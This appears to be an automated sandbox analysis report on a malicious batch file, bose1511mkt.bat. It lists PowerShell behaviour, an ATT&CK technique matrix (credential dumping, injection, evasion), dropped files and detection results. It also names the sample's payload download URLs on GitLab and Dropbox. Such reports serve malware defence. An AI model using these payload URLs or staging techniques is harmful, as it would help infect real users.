            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts1
            Command and Scripting Interpreter
            11
            Scripting
            11
            Process Injection
            1
            Masquerading
            OS Credential Dumping11
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            PowerShell
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Process Injection
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture3
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            bose1511mkt.bat5%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\Public\Document\Lib\encodings\__init__.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1026.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1125.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1140.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1250.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1251.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1252.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1253.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1254.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1255.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1256.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1257.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1258.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp273.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp424.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp437.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp500.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp720.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp737.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp775.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp850.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp852.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp855.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp856.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp857.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp858.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp860.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp861.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp862.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp863.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp864.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp865.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp866.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp869.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp874.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp875.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\hex_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\hp_roman8.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\idna.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_1.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_10.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_11.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_13.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_14.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_15.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_16.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_2.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_3.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_4.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_5.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_6.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_7.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_8.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_9.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\koi8_r.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\koi8_t.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\koi8_u.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\kz1048.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\latin_1.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_croatian.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_cyrillic.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_greek.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_iceland.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_latin2.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_roman.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_romanian.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_turkish.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mbcs.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\oem.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\palmos.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\ptcp154.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\punycode.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\quopri_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\raw_unicode_escape.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\rot_13.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\tis_620.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\undefined.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\unicode_escape.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_16.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_16_be.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_16_le.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_32.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_32_be.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_32_le.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_7.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_8.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_8_sig.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\uu_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\zlib_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\ensurepip\__init__.py0%ReversingLabs
            C:\Users\Public\Document\Lib\ensurepip\__main__.py0%ReversingLabs
            C:\Users\Public\Document\Lib\ensurepip\_uninstall.py0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.mail-archive.com/cryptography0%Avira URL Cloudsafe
            https://officeapps-df.live.com0%Avira URL Cloudsafe
            http://www2.hursley.ibm.com/decimal0%Avira URL Cloudsafe
            http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.py0%Avira URL Cloudsafe
            https://url.spec.whatwg.org/#concept-basic-url-parser0%Avira URL Cloudsafe
            https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=2031620%Avira URL Cloudsafe
            https://fishshell.com/).0%Avira URL Cloudsafe
            http://bugs.python.org/issue6857.0%Avira URL Cloudsafe
            https://bugs.python.org/issue31000%Avira URL Cloudsafe
            http://www.cs.ucdavis.edu/~rogaway/papers/eax.pdf0%Avira URL Cloudsafe
            http://idlefork.sourceforge.net0%Avira URL Cloudsafe
            http://eprint.iacr.org/2002/067.pdf0%Avira URL Cloudsafe
            https://docs.sandbox.google.com/document/fsip/0%Avira URL Cloudsafe
            http://www.gzip.org/#faq80%Avira URL Cloudsafe
            https://sales.dropboxbusiness.com/0%Avira URL Cloudsafe
            https://app.hellofax.com/0%Avira URL Cloudsafe
            https://www.hellofax.com/0%Avira URL Cloudsafe
            https://instructorledlearning.dropboxbusiness.com/100%Avira URL Cloudphishing
            https://bugs.python.org/issue465710%Avira URL Cloudsafe
            https://a.sprig.com/0%Avira URL Cloudsafe
            http://xml.python.org/entities/fragment-builder/internal0%Avira URL Cloudsafe
            https://url.spec.whatwg.org/0%Avira URL Cloudsafe
            http://bugs.python.org/issue2578.0%Avira URL Cloudsafe
            http://uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com0%Avira URL Cloudsafe
            http://lynx.browser.org/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            edge-block-www-env.dropbox-dns.com
            162.125.66.15
            truefalse
              high
              gitlab.com
              172.65.251.78
              truefalse
                high
                ipinfo.io
                34.117.59.81
                truefalse
                  high
                  www-env.dropbox-dns.com
                  162.125.66.18
                  truefalse
                    high
                    uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com
                    unknown
                    unknownfalse
                      unknown
                      www.dropbox.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1false
                          high
                          https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zipfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.mail-archive.com/cryptographypkcs1_15.py.19.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.megginson.com/SAX/.powershell.exe, 00000013.00000002.3330232690.000001E0D888A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8876000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://bugs.python.org/issue6857.powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://fishshell.com/).powershell.exe, 00000013.00000002.3330232690.000001E0D83A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D83B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://docs.python.org/library/unittest.htmlpowershell.exe, 00000013.00000002.3330232690.000001E0D9EC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://url.spec.whatwg.org/#concept-basic-url-parserpowershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=203162_test_eintr.py.19.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.dropbox.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www2.hursley.ibm.com/decimalddEncode.decTest.19.dr, ddMultiply.decTest.19.dr, dqBase.decTest.19.dr, ddFMA.decTest.19.dr, compare.decTest.19.dr, decQuad.decTest.19.dr, ddCopyNegate.decTest.19.dr, ddCanonical.decTest.19.dr, ddInvert.decTest.19.dr, ddClass.decTest.19.dr, ddToIntegral.decTest.19.dr, base.decTest.19.dr, and.decTest.19.dr, ddCompareSig.decTest.19.dr, dqCanonical.decTest.19.dr, copynegate.decTest.19.dr, ddXor.decTest.19.dr, ddMinMag.decTest.19.dr, ddNextToward.decTest.19.dr, dqCompareTotal.decTest.19.dr, dqDivide.decTest.19.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xmlpowershell.exe, 00000013.00000002.3330232690.000001E0D87D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64powershell.exe, 00000013.00000002.3330232690.000001E0D8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8E57000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bugs.python.org/issue3100test_weakref.py.19.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.do?rpowershell.exe, 0000000C.00000002.2248528679.000001F136BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.pypowershell.exe, 00000013.00000002.3330232690.000001E0D9E40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9E4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2245036004.000001F12EBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2245036004.000001F12EAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462251609.0000019DF3124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462251609.0000019DF2FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.cs.ucdavis.edu/~rogaway/papers/eax.pdfpowershell.exe, 00000013.00000002.3330232690.000001E0D82BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://opensource.org/licenses/apache2.0.phppowershell.exe, 00000013.00000002.3330232690.000001E0D852F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8525000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.python.org/sax/properties/interning-dictpowershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2230091662.000001F1200AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.dropbox.com/scl/fi/e2xjf5lc4ozmx1powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://curl.haxx.se/rfc/cookie_spec.htmlcookiejar.py.19.drfalse
                                                          high
                                                          https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2230091662.000001F11EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE2F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D79F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://login.yahoo.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.dropbox.compowershell.exe, 0000000C.00000002.2230091662.000001F11F672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.3330232690.000001E0D7C17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.3330232690.000001E0D7C17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://eprint.iacr.org/2002/067.pdfARC4.cpython-312.pyc.19.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/Iconpowershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://gitlab.com/bose1511/mkt1511/-/raw/main/16fukrun.zippowershell.exe, 0000000E.00000002.2470646595.0000019DFB160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlpowershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/python/cpython/pull/7160#discussion_r195405230powershell.exe, 00000013.00000002.3330232690.000001E0D821B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.3330232690.000001E0D7C17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://tools.ietf.org/html/rfc3986#appendix-Aclient.py.19.drfalse
                                                                                          high
                                                                                          https://github.com/python/cpython/issues/90716powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://opensource.org/licenses/mit-license.phppowershell.exe, 00000013.00000002.3330232690.000001E0D852F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8525000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.python.org/sax/properties/encodingpowershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
